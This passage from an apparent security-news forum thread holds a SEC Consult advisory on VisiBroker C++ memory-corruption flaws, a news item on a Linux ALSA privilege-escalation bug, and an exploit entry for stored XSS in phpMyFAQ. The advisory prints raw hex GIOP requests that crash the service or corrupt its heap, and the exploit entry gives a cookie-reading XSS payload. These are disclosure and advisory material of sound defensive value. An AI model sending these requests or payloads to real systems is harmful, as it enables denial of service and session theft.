https://www.forbes.com/sites/thomasbrewster/2017/10/16/worse-than-krack-google-and-microsoft-patch-massive-5-year-old-encryption-hole/#40c81a9447c3 Estonian ID cards: http://news.err.ee/616732/potential-security-risk-could-affect-750-000-estonian-id-cards The Register: https://www.theregister.co.uk/2017/10/16/roca_crypto_vuln_infineon_chips/ Paper details Paper title: The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli [ACM CCS 2017] Authors: Matus Nemec, Marek Sys, Petr Svenda, Dusan Klinec and Vashek Matyas Primary contact: Petr Svenda svenda@fi.muni.cz Conference page: ACM CCS 2017 Download author pre-print of the paper: (to be released 2nd November) Bibtex (regular paper): @inproceedings{2017-ccs-nemec, Author = {Matus Nemec and Marek Sys and Petr Svenda and Dusan Klinec and Vashek Matyas}, Title = {The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli}, BookTitle = {to appear at 24th ACM Conference on Computer and Communications Security (CCS'2017)}, Year = {2017}, ISBN = {978-1-4503-4946-8/17/10}, Publisher = {ACM} } Source
  12. Micro Focus VisiBroker C++ version 8.5 SP2 suffers from multiple memory corruption vulnerabilities. SEC Consult Vulnerability Lab Security Advisory < 20171016-0 > ======================================================================= title: Multiple vulnerabilities product: Micro Focus VisiBroker C++ vulnerable version: 8.5 SP2 fixed version: 8.5 SP4 HF3 CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283 impact: High homepage: https://www.microfocus.com/products/corba/visibroker/ found: 2017-04 by: W. Ettlinger (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying, and managing distributed applications. Built on open industry standards and a high-performance architecture, VisiBroker is especially suited to low-latency, complex, data-oriented, transaction-intensive, mission-critical environments. Using VisiBroker(R), organizations can develop, connect, and deploy complex distributed applications that have to meet very high performance and reliability standards. With more than 30 million licenses in use, VisiBroker is the worldas most widely deployed CORBA Object Request Broker (ORB) infrastructure." URL: https://www.microfocus.com/products/corba/visibroker/ Business recommendation: ------------------------ During a superficial fuzzing test, SEC Consult found several memory corruption vulnerabilities that allow denial of service attacks or potentially arbitrary code execution. Although the fuzzing test only had a very limited coverage, several vulnerabilities have been identified. Assuming the code quality is homogenous, it is possible that other parts of the application exhibit similar issues. SEC Consult did not attempt to fully evaluate the potential impact of the identified vulnerabilities. SEC Consult recommends to decommission any VisiBroker C++ component that communicates with untrusted entities until a full security audit has been performed. Moreover, SEC Consult recommends to restrict network access to all CORBA services that utilize the VisiBroker C++ environment. Vulnerability overview/description: ----------------------------------- 1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281] By specifying a large value for a length field, an integer overflow occurs. As a result, the application reads memory until a non-mapped memory region is reached. This causes the application to encounter a segmentation fault. 2) Integer Overflow (Heap Overwrite) [CVE-2017-9282] By specifying a manipulated value for a length field an attacker can cause an integer overflow. This causes the application to allocate too little memory. When the application attempts to write to this memory buffer, heap memory is overwritten leading to denial of service or potentially arbitrary code execution. 3) Out of Bounds Read [CVE-2017-9283] By specifying a manipulated value for a length field, an attacker can cause the application to read past an allocated memory region. 4) Use after Free SEC Consult found that the application under certain circumstances tries to access a memory region that has been deallocated before. It is unclear whether Micro Focus fixed the root cause of this behaviour. As the vendor was unable to reproduce the vulnerability in the current version, Micro Focus believes that the vulnerability was fixed with a previous update. Since SEC Consult is unsure whether Micro Focus found the root cause of the vulnerability, we refrain from releasing proof of concept code. Proof of concept: ----------------- A service implementing the following IDL was used to identify the vulnerabilities listed here: module Bank { interface Account { float balance(in string test); }; interface AccountManager { Account open(in string name); }; }; The implemented service was based on the Visibroker example project "bank_agent". 1) Integer Overflow / Out of Bounds Read (Denial of Service) The method CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put( CORBA_MarshalOutBuffer *this, const char *src, unsigned int size) is used to copy/append a char[] into a buffer. If the size of the data that is stored in the buffer plus the size of the char[] to be appended exceeds the allocated size, the method reallocates the buffer. By choosing the size of the char[] as e.g. 0xffffffff (on 32 bit systems) an integer overflow can be caused. The method then continues without allocating additional memory. However, the application then expects that the source buffer contains 0xffffffff bytes of memory. Since this would exceed the available process memory on 32 bit systems, the application's attempt to copy data to the destination buffer fails with an out of bounds read. The following binary request demonstrates this issue for the IDL above: 47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010 2f62616e6b5f6167656e745f706f610000ffffff42616e6b4d616e6167657200000000056f70656e 0000000000000002000000010000000c000000000001000100010109564953060000000500070801 83000000000000000000000e4a61636b20422e20517569636b00 2) Integer Overflow (Heap Overwrite) The method int __cdecl CORBA::string_alloc(unsigned int size) is used to allocate buffers for strings. Since it allocates size + 1 bytes of heap memory, specifying 0xffffffff causes an integer overflow leading to the allocation of 0 bytes. This causes heap memory to be overwritten. SEC Consult was able to use the following request to cause corruption of heap structures: 47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010 2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e 0000000000000002000000010000000c000000000001000100010109564953060000000500070801 8300000000000000ffffffff4a61636b20422e20517569636b00 3) Out of Bounds Read The constructor int __cdecl VISServiceId::VISServiceId( VISServiceId *this, CORBA_MarshalInBuffer *a2, unsigned __int32 a3, unsigned __int8 *a4) parses the GIOP key address. The VisiBroker key address consists of two strings. Before each string, a long (32 bit) value specifies the length of the string. To calculate the offset of the second string, the size of the first string is used. If this value is chosen so that the offset of the second string is outside of the GIOP message, an out of bounds read occurs. The following binary request demonstrates this issue for the IDL above: 47494f5001020000000000860000000203000000000000000000002b00504d430000000480000000 2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e 0000000000000002000000010000000c000000000001000100010109564953060000000500070801 83000000000000000000000e4a61636b20422e20517569636b00 4) Use after Free / Denial of Service Micro Focus did not clearly state that the root cause of the vulnerability has been fixed. As a precaution we refrain from releasing proof of concept code. Vulnerable / tested versions: ----------------------------- At least VisiBroker C++ 8.5 SP2 has been found to be vulnerable. According to the vendor VisiBroker 8.5 prior to SP4 HF3 are vulnerable to issues #1 - #3. Vendor contact timeline: ------------------------ 2017-05-03: Contacting vendor through security@microfocus.com, attaching encrypted security advisory 2017-05-03: Vendor: will inform us about the timeframe once the findings have been reproduced 2017-05-26: Vendor: were able to reproduce first 3 issues; requested further information for vulnerability #4 2017-05-30: Providing further information for vulnerability #4 2017-06-21: Requesting status update 2017-06-28: Vendor: First three issues have been fixed by the development team, "They have reproduced the fourth and are working on it now." 2017-06-30: Vendor: Patch will be available in a few weeks 2017-07-28: Requesting status update 2017-08-02: Vendor: There is no fixed release date for the patch yet 2017-08-28: Vendor: Initial test run found an issue that has been fixed 2017-09-15: Requesting status update 2017-09-15: Vendor: "The patches were just released on the 12th and 13th" 2017-09-18: Asking for further information about CVEs, affected versions 2017-09-21: Vendor: Issue #4 has not been fixed since the team was unable to reproduce it (the vendor stated that the issue has been reproduced, see 2017-06-26). "They [the team] believe it was already fixed by an earlier modification." 2017-09-27: Requesting clarification for issue #4 2017-09-27: Vendor: The team initially thought they had reproduced the issue; this was an unrelated issue that was fixed as well. 2017-10-16: Public release of the advisory; Solution: --------- Upgrade to version 8.5 Service Pack 4 Hotfix 3. The release notes with information on how to obtain this hotfix can be obtained here: https://community.microfocus.com/microfocus/corba/visibroker_-_world_class_middleware/w/knowledge_base/29171/visibroker-8-5-service-pack-4-hotfix-3-security-fixes Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF W. Ettlinger / @2017 Source
  13. Security researchers have discovered a new privilege-escalation vulnerability in Linux kernel that could allow a local attacker to execute code on the affected systems with elevated privileges. Discovered by Venustech ADLab (Active-Defense Lab) researchers, the Linux kernel vulnerability (CVE-2017-15265) is due to a use-after-free memory error in the Advanced Linux Sound Architecture (ALSA) sequencer interface of the affected application. The Advanced Linux Sound Architecture (ALSA) provides audio and MIDI functionality to the Linux operating system, and also bundles a userspace driven library for application developers, enabling direct (kernel) interaction with sound devices through ALSA libraries. Successful exploitation of this vulnerability requires an attacker—with local access on the targeted system—to execute a maliciously crafted application on a targeted system, which allows the attacker to elevate his privilege to root on the targeted system, a Cisco advisory warned. The vulnerability affects major distributions of the Linux operating system including RedHat, Debian, Ubuntu, and Suse, and is triggered by a slip in snd_seq_create_port(). The vulnerability has been patched in Linux kernel version 4.13.4-2, which was fixed just by taking the refcount properly at "snd_seq_create_port()" and letting the caller unref the object after use. Administrators are advised to apply the appropriate updates on their Linux distributions as soon as they receive them from their respective distro. They're also recommended to allow only trusted users to access local systems and always monitor affected systems. This flaw is yet another privilege escalation vulnerability recently uncovered in the Linux kernel. Last month, a high-risk 2-year-old potential local privilege escalation flaw was patched in the Linux kernel that affected all major Linux distributions, including Red Hat, Debian, and CentOS. In February, another privilege-escalation vulnerability that dates back to 2011 disclosed and patched in the Linux kernel which also affected major Linux distro, including Redhat, Debian, OpenSUSE, and Ubuntu. Via thehackernews.com
  14. # Exploit Title: phpMyFAQ 2.9.8 Stored XSS # Vendor Homepage: http://www.phpmyfaq.de/ # Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip # Exploit Author: Ishaq Mohammed # Contact: https://twitter.com/security_prince # Website: https://about.me/security-prince # Category: webapps # CVE: CVE-2017-14619 1. Description Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the "Title of your FAQ" field in the Configuration Module. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619 2. Proof of Concept Steps to Reproduce: 1. Open the affected link http://localhost/phpmyfaq/admin/?action=config with logged in user with administrator privileges 2. Enter the <marquee onscroll=alert(document.cookie)> in the “Title of your FAQ field” 3. Save the Configuration 4. Login using any other user or simply click on the phpMyFAQ on the top-right hand side of the web portal 3. Solution: The Vulnerability will be fixed in the next release of phpMyFAQ # 0day.today [2017-10-13] # Source: 0day.today